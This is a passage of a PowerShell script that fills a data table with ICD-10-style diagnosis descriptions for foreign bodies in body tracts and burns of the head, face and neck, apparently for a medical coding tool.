encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in bronchus causing other injury","Unspecified foreign body in bronchus causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in bronchus causing asphyxiation","Gastric contents in bronchus causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in bronchus causing asphyxiation","Gastric contents in bronchus causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in bronchus causing asphyxiation","Gastric contents in bronchus causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in bronchus causing other injury","Gastric contents in bronchus causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in bronchus causing other injury","Gastric contents in bronchus causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in bronchus causing other injury","Gastric contents in bronchus causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Food in bronchus causing asphyxiation","Food in bronchus causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in bronchus causing asphyxiation","Food in bronchus causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in bronchus causing asphyxiation","Food in bronchus causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Food in bronchus causing other injury","Food in bronchus causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in bronchus causing other injury","Food in bronchus causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in bronchus causing other injury","Food in bronchus causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in bronchus causing asphyxiation","Other foreign object in bronchus causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in bronchus causing asphyxiation","Other foreign object in bronchus causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in bronchus causing asphyxiation","Other foreign object in bronchus causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in bronchus causing other injury","Other foreign object in bronchus causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in bronchus causing other injury","Other foreign object in bronchus causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in bronchus causing other injury","Other foreign object in bronchus causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in other parts of respiratory tract causing asphyxiation","Unspecified foreign body in other parts of respiratory tract causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in other parts of respiratory tract causing asphyxiation","Unspecified foreign body in other parts of respiratory tract causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in other parts of respiratory tract causing asphyxiation","Unspecified foreign body in other parts of respiratory tract causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in other parts of respiratory tract causing other injury","Unspecified foreign body in other parts of respiratory tract causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in other parts of respiratory tract causing other injury","Unspecified foreign body in other parts of respiratory tract causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in other parts of respiratory tract causing other injury","Unspecified foreign body in other parts of respiratory tract causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in other parts of respiratory tract causing asphyxiation","Gastric contents in other parts of respiratory tract causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in other parts of respiratory tract causing asphyxiation","Gastric contents in other parts of respiratory tract causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in other parts of respiratory tract causing asphyxiation","Gastric contents in other parts of respiratory tract causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in other parts of respiratory tract causing other injury","Gastric contents in other parts of respiratory tract causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in other parts of respiratory tract causing other injury","Gastric contents in other parts of respiratory tract causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in other parts of respiratory tract causing other injury","Gastric contents in other parts of respiratory tract causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Food in other parts of respiratory tract causing asphyxiation","Food in other parts of respiratory tract causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in other parts of respiratory tract causing asphyxiation","Food in other parts of respiratory tract causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in other parts of respiratory tract causing asphyxiation","Food in other parts of respiratory tract causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Food in other parts of respiratory tract causing other injury","Food in other parts of respiratory tract causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in other parts of respiratory tract causing other injury","Food in other parts of respiratory tract causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in other parts of respiratory tract causing other injury","Food in other parts of respiratory tract causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in other parts of respiratory tract causing asphyxiation","Other foreign object in other parts of respiratory tract causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in other parts of respiratory tract causing asphyxiation","Other foreign object in other parts of respiratory tract causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in other parts of respiratory tract causing asphyxiation","Other foreign object in other parts of respiratory tract causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in other parts of respiratory tract causing other injury","Other foreign object in other parts of respiratory tract causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in other parts of respiratory tract causing other injury","Other foreign object in other parts of respiratory tract causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in other parts of respiratory tract causing other injury","Other foreign object in other parts of respiratory tract causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in respiratory tract, part unspecified causing asphyxiation","Unspecified foreign body in respiratory tract, part unspecified causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in respiratory tract, part unspecified causing asphyxiation","Unspecified foreign body in respiratory tract, part unspecified causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in respiratory tract, part unspecified causing asphyxiation","Unspecified foreign body in respiratory tract, part unspecified causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in respiratory tract, part unspecified causing other injury","Unspecified foreign body in respiratory tract, part unspecified causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in respiratory tract, part unspecified causing other injury","Unspecified foreign body in respiratory tract, part unspecified causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in respiratory tract, part unspecified causing other injury","Unspecified foreign body in respiratory tract, part unspecified causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in respiratory tract, part unspecified causing asphyxiation","Gastric contents in respiratory tract, part unspecified causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in respiratory tract, part unspecified causing asphyxiation","Gastric contents in respiratory tract, part unspecified causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in respiratory tract, part unspecified causing asphyxiation","Gastric contents in respiratory tract, part unspecified causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in respiratory tract, part unspecified causing other injury","Gastric contents in respiratory tract, part unspecified causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in respiratory tract, part unspecified causing other injury","Gastric contents in respiratory tract, part unspecified causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in respiratory tract, part unspecified causing other injury","Gastric contents in respiratory tract, part unspecified causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Food in respiratory tract, part unspecified causing asphyxiation","Food in respiratory tract, part unspecified causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in respiratory tract, part unspecified causing asphyxiation","Food in respiratory tract, part unspecified causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in respiratory tract, part unspecified causing asphyxiation","Food in respiratory tract, part unspecified causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Food in respiratory tract, part unspecified causing other injury","Food in respiratory tract, part unspecified causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in respiratory tract, part unspecified causing other injury","Food in respiratory tract, part unspecified causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in respiratory tract, part unspecified causing other injury","Food in respiratory tract, part unspecified causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in respiratory tract, part unspecified in causing asphyxiation","Other foreign object in respiratory tract, part unspecified in causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in respiratory tract, part unspecified in causing asphyxiation","Other foreign object in respiratory tract, part unspecified in causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in respiratory tract, part unspecified in causing asphyxiation","Other foreign object in respiratory tract, part unspecified in causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in respiratory tract, part unspecified causing other injury","Other foreign object in respiratory tract, part unspecified causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in respiratory tract, part unspecified causing other injury","Other foreign object in respiratory tract, part unspecified causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in respiratory tract, part unspecified causing other injury","Other foreign object in respiratory tract, part unspecified causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in mouth","Foreign body in mouth, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in mouth","Foreign body in mouth, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in mouth","Foreign body in mouth, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in esophagus causing compression of trachea","Unspecified foreign body in esophagus causing compression of trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in esophagus causing compression of trachea","Unspecified foreign body in esophagus causing compression of trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in esophagus causing compression of trachea","Unspecified foreign body in esophagus causing compression of trachea, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in esophagus causing other injury","Unspecified foreign body in esophagus causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in esophagus causing other injury","Unspecified foreign body in esophagus causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in esophagus causing other injury","Unspecified foreign body in esophagus causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in esophagus causing compression of trachea","Gastric contents in esophagus causing compression of trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in esophagus causing compression of trachea","Gastric contents in esophagus causing compression of trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in esophagus causing compression of trachea","Gastric contents in esophagus causing compression of trachea, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in esophagus causing other injury","Gastric contents in esophagus causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in esophagus causing other injury","Gastric contents in esophagus causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in esophagus causing other injury","Gastric contents in esophagus causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Food in esophagus causing compression of trachea","Food in esophagus causing compression of trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in esophagus causing compression of trachea","Food in esophagus causing compression of trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in esophagus causing compression of trachea","Food in esophagus causing compression of trachea, sequela") + $null = $DiagnosisList.Rows.Add("Food in esophagus causing other injury","Food in esophagus causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in esophagus causing other injury","Food in esophagus causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in esophagus causing other injury","Food in esophagus causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in esophagus causing compression of trachea","Other foreign object in esophagus causing compression of trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in esophagus causing compression of trachea","Other foreign object in esophagus causing compression of trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in esophagus causing compression of trachea","Other foreign object in esophagus causing compression of trachea, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in esophagus causing other injury","Other foreign object in esophagus causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in esophagus causing other injury","Other foreign object in esophagus causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in esophagus causing other injury","Other foreign object in esophagus causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in stomach","Foreign body in stomach, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in stomach","Foreign body in stomach, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in stomach","Foreign body in stomach, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in small intestine","Foreign body in small intestine, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in small intestine","Foreign body in small intestine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in small intestine","Foreign body in small intestine, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in colon","Foreign body in colon, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in colon","Foreign body in colon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in colon","Foreign body in colon, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in anus and rectum","Foreign body in anus and rectum, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in anus and rectum","Foreign body in anus and rectum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in anus and rectum","Foreign body in anus and rectum, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in other parts of alimentary tract","Foreign body in other parts of alimentary tract, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in other parts of alimentary tract","Foreign body in other parts of alimentary tract, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in other parts of alimentary tract","Foreign body in other parts of alimentary tract, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body of alimentary tract, part unspecified","Foreign body of alimentary tract, part unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body of alimentary tract, part unspecified","Foreign body of alimentary tract, part unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body of alimentary tract, part unspecified","Foreign body of alimentary tract, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in urethra","Foreign body in urethra, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in urethra","Foreign body in urethra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in urethra","Foreign body in urethra, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in bladder","Foreign body in bladder, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in bladder","Foreign body in bladder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in bladder","Foreign body in bladder, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in vulva and vagina","Foreign body in vulva and vagina, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in vulva and vagina","Foreign body in vulva and vagina, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in vulva and vagina","Foreign body in vulva and vagina, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in uterus","Foreign body in uterus, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in uterus","Foreign body in uterus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in uterus","Foreign body in uterus, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in penis","Foreign body in penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in penis","Foreign body in penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in penis","Foreign body in penis, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in other parts of genitourinary tract","Foreign body in other parts of genitourinary tract, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in other parts of genitourinary tract","Foreign body in other parts of genitourinary tract, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in other parts of genitourinary tract","Foreign body in other parts of genitourinary tract, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in genitourinary tract, part unspecified","Foreign body in genitourinary tract, part unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in genitourinary tract, part unspecified","Foreign body in genitourinary tract, part unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in genitourinary tract, part unspecified","Foreign body in genitourinary tract, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of head, face, and neck, unspecified site","Burn of unspecified degree of head, face, and neck, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of head, face, and neck, unspecified site","Burn of unspecified degree of head, face, and neck, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of head, face, and neck, unspecified site","Burn of unspecified degree of head, face, and neck, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right ear [any part, except ear drum]","Burn of unspecified degree of right ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right ear [any part, except ear drum]","Burn of unspecified degree of right ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right ear [any part, except ear drum]","Burn of unspecified degree of right ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left ear [any part, except ear drum]","Burn of unspecified degree of left ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left ear [any part, except ear drum]","Burn of unspecified degree of left ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left ear [any part, except ear drum]","Burn of unspecified degree of left ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified ear [any part, except ear drum]","Burn of unspecified degree of unspecified ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified ear [any part, except ear drum]","Burn of unspecified degree of unspecified ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified ear [any part, except ear drum]","Burn of unspecified degree of unspecified ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of lip(s)","Burn of unspecified degree of lip(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of lip(s)","Burn of unspecified degree of lip(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of lip(s)","Burn of unspecified degree of lip(s), sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of chin","Burn of unspecified degree of chin, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of chin","Burn of unspecified degree of chin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of chin","Burn of unspecified degree of chin, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of nose (septum)","Burn of unspecified degree of nose (septum), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of nose (septum)","Burn of unspecified degree of nose (septum), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of nose (septum)","Burn of unspecified degree of nose (septum), sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of scalp [any part]","Burn of unspecified degree of scalp [any part], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of scalp [any part]","Burn of unspecified degree of scalp [any part], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of scalp [any part]","Burn of unspecified degree of scalp [any part], sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of forehead and cheek","Burn of unspecified degree of forehead and cheek, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of forehead and cheek","Burn of unspecified degree of forehead and cheek, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of forehead and cheek","Burn of unspecified degree of forehead and cheek, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of neck","Burn of unspecified degree of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of neck","Burn of unspecified degree of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of neck","Burn of unspecified degree of neck, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of head, face, and neck","Burn of unspecified degree of multiple sites of head, face, and neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of head, face, and neck","Burn of unspecified degree of multiple sites of head, face, and neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of head, face, and neck","Burn of unspecified degree of multiple sites of head, face, and neck, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of head, face, and neck, unspecified site","Burn of first degree of head, face, and neck, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of head, face, and neck, unspecified site","Burn of first degree of head, face, and neck, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of head, face, and neck, unspecified site","Burn of first degree of head, face, and neck, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right ear [any part, except ear drum]","Burn of first degree of right ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right ear [any part, except ear drum]","Burn of first degree of right ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right ear [any part, except ear drum]","Burn of first degree of right ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left ear [any part, except ear drum]","Burn of first degree of left ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left ear [any part, except ear drum]","Burn of first degree of left ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left ear [any part, except ear drum]","Burn of first degree of left ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified ear [any part, except ear drum]","Burn of first degree of unspecified ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified ear [any part, except ear drum]","Burn of first degree of unspecified ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified ear [any part, except ear drum]","Burn of first degree of unspecified ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of lip(s)","Burn of first degree of lip(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of lip(s)","Burn of first degree of lip(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of lip(s)","Burn of first degree of lip(s), sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of chin","Burn of first degree of chin, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of chin","Burn of first degree of chin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of chin","Burn of first degree of chin, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of nose (septum)","Burn of first degree of nose (septum), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of nose (septum)","Burn of first degree of nose (septum), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of nose (septum)","Burn of first degree of nose (septum), sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of scalp [any part]","Burn of first degree of scalp [any part], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of scalp [any part]","Burn of first degree of scalp [any part], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of scalp [any part]","Burn of first degree of scalp [any part], sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of forehead and cheek","Burn of first degree of forehead and cheek, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of forehead and cheek","Burn of first degree of forehead and cheek, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of forehead and cheek","Burn of first degree of forehead and cheek, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of neck","Burn of first degree of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of neck","Burn of first degree of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of neck","Burn of first degree of neck, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of head, face, and neck","Burn of first degree of multiple sites of head, face, and neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of head, face, and neck","Burn of first degree of multiple sites of head, face, and neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of head, face, and neck","Burn of first degree of multiple sites of head, face, and neck, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of head, face, and neck, unspecified site","Burn of second degree of head, face, and neck, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of head, face, and neck, unspecified site","Burn of second degree of head, face, and neck, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of head, face, and neck, unspecified site","Burn of second degree of head, face, and neck, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right ear [any part, except ear drum]","Burn of second degree of right ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right ear [any part, except ear drum]","Burn of second degree of right ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right ear [any part, except ear drum]","Burn of second degree of right ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left ear [any part, except ear drum]","Burn of second degree of left ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left ear [any part, except ear drum]","Burn of second degree of left ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left ear [any part, except ear drum]","Burn of second degree of left ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified ear [any part, except ear drum]","Burn of second degree of unspecified ear [any part, except ear drum], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified ear [any part, except ear drum]","Burn of second degree of unspecified ear [any part, except ear drum], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified ear [any part, except ear drum]","Burn of second degree of unspecified ear [any part, except ear drum], sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of lip(s)","Burn of second degree of lip(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of lip(s)","Burn of second degree of lip(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of lip(s)","Burn of second degree of lip(s), sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of chin","Burn of second degree of chin, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of chin","Burn of second degree of chin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of chin","Burn of second degree of chin, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of nose (septum)","Burn of second degree of nose (septum), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of nose (septum)","Burn of second degree of nose (septum), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of nose (septum)","Burn of second degree of nose (septum), sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of scalp [any part]","Burn of second degree of scalp [any part], initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of scalp [any part]","Burn of second degree of scalp [any part], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of scalp [any part]","Burn of second degree of scalp [any part], sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of forehead and cheek","Burn of second degree of forehead and cheek, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of forehead and cheek","Burn of second degree of forehead and cheek, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of forehead and cheek","Burn of second degree of forehead and cheek, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of neck","Burn of second degree of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of neck","Burn of second degree of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of neck","Burn of second degree of neck, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of head, face, and neck","Burn of second degree of multiple sites of head, face, and neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of head, face, and neck","Burn of second degree of multiple sites of head, face, and neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of head, face, and neck","Burn of second degree of multiple sites of head, face, and neck, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of head, face, and neck, unspecified site","Burn of third degree of head, face, and neck, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of head, face, and neck, unspecified site","Burn of third degree of head, face, and neck, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of head, face, and neck, unspecified site","Burn of third degree of head, face, and neck, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right ear [any part, except ear 